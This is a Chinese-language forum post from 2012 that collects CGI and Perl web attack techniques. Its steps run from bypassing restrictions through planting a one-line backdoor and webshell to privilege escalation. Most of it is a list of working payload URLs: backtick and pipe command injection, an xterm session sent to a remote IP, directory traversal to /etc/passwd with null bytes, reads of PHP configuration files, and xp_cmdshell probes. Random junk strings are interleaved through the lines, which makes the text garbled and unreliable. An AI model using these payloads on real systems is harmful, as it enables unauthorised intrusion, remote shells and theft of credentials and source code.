找回密码
 立即注册
查看: 3419|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  8 t0 r' b% F6 a: {9 C2 e' e
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  / e% f; F1 b5 ^/ I/ Y
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  . I; m1 A. J4 m+ K2 O$ j
注“  $ T0 [! ?/ Y7 a. x* t/ \
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
- g8 s, {( q* `7 u" n以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  & J/ Z% ^/ D; y/ U5 H/ k% P

) D. ^9 Z2 I/ t6 K" S! @http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  * r4 I3 c- }; y5 j7 l( o
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
2 [, _/ v6 Z8 H! V9 W" ehttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  6 Z6 [" G/ A6 e5 K( u) m' e! `
http://target.com/cgi-bin/home/news/sub.pl?`id`  
- [' n( R7 y7 C0 I- D- `" |% `http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  ' t2 O; E% e* J) \6 U' }
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  ' e/ V* E) F) N& k- ]/ [
+ F; B, K8 }% E. I: u
http://target.com/test.pl;ls|  
9 x3 j: `& E+ o9 b2 Hhttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
; P- x, H: j$ T! b$ z0 Y9 h- mhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
6 Z1 ^8 s# |, M$ M* u8 U4 hhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  8 a3 l, }/ }. w5 V3 g1 u! N; p9 u
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  7 x' u8 i9 d) B. y8 z  X. w$ ~
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
/ \; G4 r) ]" {8 r; V3 `
. L! E& l4 _: c0 U) lhttp://target.com/test.pl?&........ /../../etc/passwd  " k9 }! d* @) t% e7 P

% p1 t$ I0 t+ q- X: Hhttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  9 P! E) V1 a! y9 j# E
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
5 R' y4 }8 @* F; D+ `, Thttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
8 k5 l: s7 ~. _6 g4 u
( O$ _5 a7 h9 t, J5 Nhttp://www.target.org/show.php?f ... /include/config.php 查看php代码  
3 m+ X" g' F$ N( o+ Khttp://www.target.org/show.php?f ... ng/admin/global.php  
0 h3 N  |' V0 M. k5 f5 E6 x  n' Z7 e; ^  N8 ?  H$ S% y( l: z
emm和ps的一句话% n2 o% g, B2 T4 f; w
& z. ?8 w8 y7 W2 w6 r
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  
- y7 F- H$ I$ j5 V1 k: j/ [, h, W) w. B; u8 w* t5 J1 B
>bbb%20|  / T" C, d( J* w/ }- H1 R

& S% ]2 m9 U8 k. g, @) i/ J2 ]$ ^http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
9 F- r0 m! Z, T: s
7 }# E, y5 W% B3 whttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  8 n3 u$ e- o/ w  G, w0 O, J" Y! y7 s
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
# x. ?8 g. W/ Q6 [$ K/ s6 C; j: b* R
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
- x* y- e: l5 A/ H% D  A$ [; Fhttp://target.com/index.html#cmd.exe  
4 p- V9 b( J% o2 M& M9 yhttp://target.com/index.html?dummyparam=xp_cmdshell  ' g3 L; M% \: x4 \) P
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  1 `2 M% f1 K4 K) q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表